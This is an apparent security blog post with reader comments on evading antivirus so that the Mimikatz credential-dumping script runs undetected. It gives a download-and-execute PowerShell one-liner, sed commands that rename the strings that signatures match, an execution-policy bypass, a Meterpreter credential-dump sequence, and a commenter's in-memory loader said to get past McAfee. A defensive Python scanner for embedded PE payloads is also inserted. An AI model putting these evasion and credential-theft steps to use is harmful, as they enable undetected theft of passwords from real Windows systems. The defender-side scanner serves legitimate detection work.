How to Bypass Anti-Virus to Run Mimikatz
Carrie Roberts // *
Would you like to run Mimikatz without Anti-Virus (AV) detecting it? Recently I attempted running the PowerShell script “Invoke-Mimikatz” from PowerSploit on my machine but it was flagged by Windows Defender as malicious when saving the file to disk. Even when I ran this file without writing it to disk using the following command it still got caught.
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz"
Uploading the Invoke-Mimikatz.ps1 file to VirusTotal showed that 19 of 54 AV vendors currently detect this file as malicious.
While uploading to VirusTotal is not a conclusive way to determine whether a malicious file will be detected, it can hint at what AV may be triggering on.
As you may know, AV detection schemes can be weak, simply looking for specific words in the file. Often these words can be changed without changing the functionality. For example, changing “Invoke-Mimikatz” to “Invoke-Mimidogz” using the following Linux command brings the detection rate down to 8 of 54.
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
And how about getting rid of those unnecessary comments in the script?
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
We are down to four (4) AV vendors detecting the malicious file after renaming “Katz” to “Dogz” and removing comments. A little further experimentation shows that AV doesn’t like the word “DumpCreds”, so let’s change it to “DumpCred”.
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
We could probably quit here and get a lot of mileage out of this script, but as my daughter would say after reading the disclaimer on hand sanitizer, “Why don’t they just put a little bit more in and kill ‘em all!?”
So let’s do this. Just add three more match and replace rules and “Winner, winner, chicken dinner!” The complete list of match and replace commands is listed below.
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
We took this modified Mimikatz file and ran it against systems running up-to-date versions of Windows Defender, Symantec, and ESET. (Thanks to Brian Fehrman and David Fletcher). We were able to run the script to dump cleartext passwords from memory and it was not detected by AV.
We successfully modified the Mimikatz script to avoid AV detection without changing its functionality. This is good evidence of why you should not rely solely on your AV for protection.
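As an added, defender-side example that is not part of the original post: a small Python scanner, run over a constructed stand-in script, shows why the literal-identifier signatures the post defeats are brittle, and why an indicator the renames never touch (a long base64 run that decodes to a PE “MZ” header, which Invoke-Mimikatz embeds as its DLL payload) still fires after the same edits. The sample script, the signature list, and the function names are assumptions constructed for the demo.

```python
import base64
import re

# Constructed sample, NOT the real Invoke-Mimikatz: it carries only the identifiers the
# post's sed rules rename plus a base64 blob whose first bytes decode to a PE ("MZ") header,
# which is what a reflective loader embeds and what the renames never touch.
FAKE_PE_B64 = base64.b64encode(
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00" + b"\x00" * 48).decode()

SAMPLE_SCRIPT = f"""<#
.SYNOPSIS
Constructed stand-in for a reflective loader (demo only).
#>
function Invoke-Mimikatz {{
    Param([Switch]$DumpCreds)
    # comment line that the post's second sed rule strips
    $PEBytes64 = '{FAKE_PE_B64}'
    $ArgumentPtr = [IntPtr]::Zero
    CallDllMainSC1 -Win32Functions $Win32Functions
}}
"""

# The identifier "signatures" the post defeats, and the renames the post applies to them.
NAME_SIGNATURES = ["Invoke-Mimikatz", "DumpCreds", "ArgumentPtr", "CallDllMainSC1"]
POST_RENAMES = [("Invoke-Mimikatz", "Invoke-Mimidogz"), ("DumpCreds", "DumpCred"),
                ("ArgumentPtr", "NotTodayPal"),
                ("CallDllMainSC1", "ThisIsNotTheStringYouAreLookingFor")]

def apply_post_renames(script: str) -> str:
    """Reproduce the post's sed edits: drop <# #> blocks and # lines, then rename."""
    script = re.sub(r"<#.*?#>", "", script, flags=re.S)
    script = re.sub(r"(?m)^[ \t]*#.*$", "", script)
    for old, new in POST_RENAMES:
        script = script.replace(old, new)
    return script

def name_signature_hits(script: str) -> list:
    """Brittle detection: literal identifier matching, as the post shows AV doing."""
    return [sig for sig in NAME_SIGNATURES if sig in script]

B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")

def embedded_pe_found(script: str) -> bool:
    """Sturdier indicator: any long base64 run whose decoded prefix is an MZ header."""
    for run in B64_RUN.finditer(script):
        try:
            head = base64.b64decode(run.group(0)[:60])  # 60 chars -> 45 bytes
        except ValueError:
            continue
        if head[:2] == b"MZ":
            return True
    return False

def scan(script: str) -> dict:
    return {"name_hits": name_signature_hits(script), "embedded_pe": embedded_pe_found(script)}
```

A production rule would decode further and validate the PE header fields, but the point stands: detections keyed on payload structure survive the cosmetic edits that defeat word lists.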
*This post is part of the bigger “Sacred Cash Cow Tipping” series about bypassing AV, particularly our most recent episode found here.
Jerry
January 5, 2017 @ 11:21 am
Would it be possible to do something like this to the Mimikatz modules inside the Empire framework?
Carrie Roberts
January 5, 2017 @ 7:15 pm
Hi Jerry, Yes it would, or, because Empire lets you run any PowerShell you want, you can have it import your modified Mimikatz script using the “scriptimport ./path/” command and then call your version of Invoke-Mimikatz using the “scriptcmd” command. See the bottom paragraph of this page of the Empire manual http://www.powershellempire.com/?page_id=110 and here for some examples of its use: https://warroom.securestate.com/leveraging-ms16-032-powershell-empire/
Manu
January 6, 2017 @ 9:12 am
Which were the last 2 anti-virus?
Carrie Roberts
January 6, 2017 @ 10:16 am
ESET-NOD32 and Rising
Jonathan
January 20, 2017 @ 11:49 am
Awesome post, Carrie. Quick question: What was the PowerShell execution policy set to on your test machine?
Carrie Roberts
January 23, 2017 @ 8:21 am
My execution policy was “Restricted” but I used the “powershell -exec bypass” command to allow me to run the Mimikatz script. This sets the execution policy to “Bypass” for the current session and allows running the script.
Phil Ivey
March 14, 2017 @ 10:03 am
Why don’t you just use reflective DLL injection to run mimikatz from memory? There’s no need to do any of this.
Carrie Roberts
March 14, 2017 @ 11:01 am
Hi Phil, somewhat surprisingly, that solution by itself does not work against Windows Defender. Give it a try . . .
Phil Ivey
March 14, 2017 @ 12:51 pm
It certainly does work – I do it regularly. Both Metasploit and Empire do it out-of-the-box.
1. Get session
2. msf> sessions -i 1
3. meterpreter> getsystem
4. meterpreter> load kiwi
5. meterpreter> creds_all
The approach is similar in Empire, don’t remember the commands off the top of my head.
Carrie Roberts
March 14, 2017 @ 6:29 pm
I was referring to this: powershell "IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz" as I was looking for a solution that did not require a Meterpreter or Empire session, which can often be an additional hurdle to overcome.
Phil Ivey
March 14, 2017 @ 6:51 pm
To each her own I guess… seems like manually obfuscating PowerShell code is a bigger hurdle than just catching a session and using DLL injection. If you can fetch a file from GitHub, you can establish a Meterpreter/Empire session too.
Quentin
March 27, 2017 @ 5:21 am
Hi,
Is it possible to use this modified PowerShell script and convert it into an exe file? If so, can you tell me how you would proceed, please?
Thank you.
Carrie Roberts
March 27, 2017 @ 8:55 am
Hi Quentin,
Give this a try for converting PowerShell to an executable:
https://gallery.technet.microsoft.com/PS2EXE-Convert-PowerShell-9e4e07f1
Miguel
April 11, 2017 @ 8:16 pm
Hi Carrie, is this process now out of date? My detection ratio was 14/56 after I executed the match and replace commands. Thanks
Carrie Roberts
April 12, 2017 @ 10:06 am
Hi Miguel, yes. The AV vendors have made additional changes after this post came out such that it doesn’t work as specified. Although, I have experimented with it again and found that many of the AV vendors still look for static words in the file, just different ones than I’ve published. Some trial and error may be in order to figure out what needs to change.
Tony G
July 25, 2017 @ 2:11 pm
Why use IEX? The script below goes straight into memory without calling Internet Explorer (which may be why Defender is catching it). This gets past McAfee without incident:
$uri = 'https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1'
# Get the script code:
$functionCode = Invoke-RestMethod -Method Get -Uri $uri
# The dog, the dog, is my heart; the cat, the cat, the cat is no good.
$mimidogzCode = $functionCode -replace "Invoke-Mimikatz", "Invoke-Mimidogz"
# Instantiate a ScriptBlock passing the
# source code to the constructor:
$mimidogz = [ScriptBlock]::Create($mimidogzCode)
# Load it into memory (dot-source the script block so its function is defined in this scope):
. $mimidogz
# Done!
Invoke-Mimidogz
Jeff
July 31, 2017 @ 11:01 am
I can’t get the PowerShell you used above to work 🙁
If I simply copy and paste I get
string : The term ‘string’ is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:23
+ string DownloadString(string address), string DownloadString(uri addr …
+ ~~~~~~
+ CategoryInfo : ObjectNotFound: (string:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
Typing it in manually, it still fails to execute, and it’s on a box with no AV of any kind. What am I missing 🙂
Wombat Hunter
July 31, 2017 @ 1:11 pm
What specific piece did you copy and paste? It sounds like you either copy and pasted wrong or your PowerShell environment is jacked.
Jeff
August 1, 2017 @ 12:27 pm
It was a PowerShell that was jacked up. Spent about 2 hours fighting with it until I decided to build a fresh box and then it worked. Talk about wow…